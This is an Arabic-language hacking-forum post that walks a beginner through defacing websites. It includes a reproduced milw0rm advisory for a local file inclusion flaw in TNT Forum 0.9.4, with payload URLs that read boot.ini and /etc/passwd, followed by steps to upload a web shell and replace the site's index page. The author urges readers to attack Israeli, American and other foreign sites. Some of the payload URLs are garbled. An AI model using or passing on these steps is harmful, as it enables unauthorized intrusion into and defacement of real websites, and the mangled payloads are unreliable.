والسيرفر معنآه ( خآدم )
ونطلع آلآي بي (ip) آلموووقع
رآح تقولي يااستكنان كيف آطلع كل هذا ؟؟
آقولك روح لي (( آبدأ (start) ــــ> وبعدين لي تشغيل (ren) ـــ> بعدين آكتب cmd
رآح تطلع لك شآشه سودآ
بعين آكتب ping
وبعدين رآبط آلموقع بدون (vb) ولآ(http)
يعني كذا ping
www.xxxx.comولاتنسى آلمسآفه بين ping ورآبط آلموقع
_-_-_-_-_-_-_-_-_-_-_-_-_-_-
وبعدين تطلع لك آرقآم كثيره كلهآ نفس الشي
خذ آول آلآرقآم وحفظه
وبعدين روح لي
www.live.comآو
www.msn.comوكتب كذا :
ip:XXXXXXXXX
علمآ آن XXXXX آي بي آلموقع ( ip)
آلحين طلعنآ آلسيرفر وخلصنآ رآح تقولي
شلون آبي آخترق آلحين ؟؟؟؟؟؟؟؟؟؟؟؟
آقولك يآطويل العمر
روح للموقع هذا :
http://www.milw0rm.com/×××apps.phpودور آخر آلثغرآآت
ورآح تقولي آنآ لقيت ثغره وشلون آخترق آلموقع آلحين .؟.؟
آقولك آدخل على آول وحد يعني آول موضوع
رآح تطلع لك شآشه بيضآء مكتوب عليهآ نفس كذآ :
================================================== ====
TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
================================================== ====
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 10 June 2008
SITE :
www.citec.us################################################## ###
APPLICATION : TNT Forum
VERSION : 0.9.4
DOWNLOAD : download.tntforum.tuttoeniente.net
################################################## ###
---LFI---
################################################## ###############
Vulnerable in index.php:
137: //Variabili generali
138: $modulo = @$____['modulo'];
139: $modfile = 'mod_'.$modulo.'.php';
################################################## ###############
Exploit:
[+] For Windows
http://[Tar___]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00[+] For Linux
http://localhost/tntforum/index.php?.../etc/passwd%00################################################## ################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
################################################## ################
# milw0rm.com [2008-06-10]
آدري آنك مآفهمت شي
آلحين روح دور على كلمة :
Example
آذآ لقيتهآ رآح تلقآ جنبهآ آو تحتها آستغلال آلثغره ( آلآستغلال هو آهم شي ومآيحتآج شرح )
وهذآ هو آلآستغلال :
http://localhost/tntforum/index.php?.../etc/passwd%00هذآ تحطه بعد رآبط آلموقع على طول يعني يصير كذآ :
http://xxxx.com/tntforum/index.php?m.../etc/passwd%00علمآ آن آخر كلمة بعد علآمه = هذي=../../../../../../../../الشل
ولآ تنسى تكتب آخر شي "؟" علامة ؟ هي آهم شي هالعلامه (؟)
نفضر آننآ طلعنآ آلسيرفر وطلعنآ آلآي بي ip وطلعنآ آلثغره وآلآستغلآل
نفتضر آن آلرآبط طلع خطأ!!!!
معنآتهآ آن آلثغره مرقعه يعني مآيصير
تروح لي للموضوع آلثآني وآنت تدوور على آلآستغلال
آلحين آنت تقولي من وين آجيب آلشل ؟.
آقول روح دور بمواضيع المنتدا تلقا
_-__-_-_-_-_-_--_--_------
آنت آلحين تقولي آنآ رفعت آلشل آلحين
وش آسوي ؟؟؟؟؟؟؟؟؟؟ووش آلفآيده آلحين .؟؟؟؟؟
وش آلفآيده ؟ آنك آلحين تشوف كل ملفآت آلموقع بس وتحذف وتعدل بس بشرط !!!!!
آذآ كآنت حآلتك root على آلسيرفر فأنت آلملك آلحين !
وذآ كآنت حآلتك user فآنت وزير الملك
وآذآ كآنت حآلتك nbode
فآنت زآئر مآتقدر تعدل ولآ تحذف آلآعلى آلموقع آلي عليها تصريح (777)
تقدر تسوي آلي تبي !
وتقولي شلون آدري آن فيه موآقع عليها تصريح (777)
آقولك رآح يكون لونهآ آخضر !
ولحين رآح تقولي وش آسوي آبي آخترق آلموقع !
رآح آقولك آدخل على آلموقع آلي تبيه
وبعدين روح لي UP وبعدين آستعرآض وبعدين آندكس آلآخترآآآآآق
________________________________
ومبروووووووووووووووووك آخترقت آلموقع
هذا الي عندي <<~~~اذا عجبكم الموضوع لا تبخلو بالتقييم
ارجو ان التجريب يكون ع مواقع اسرائليه ولا امريكيه ولا اجنبيه اهم شي اني ابري نفسي
مع السلامهـ
نرجو تسجيل بلموقع ليصلك كل جديد
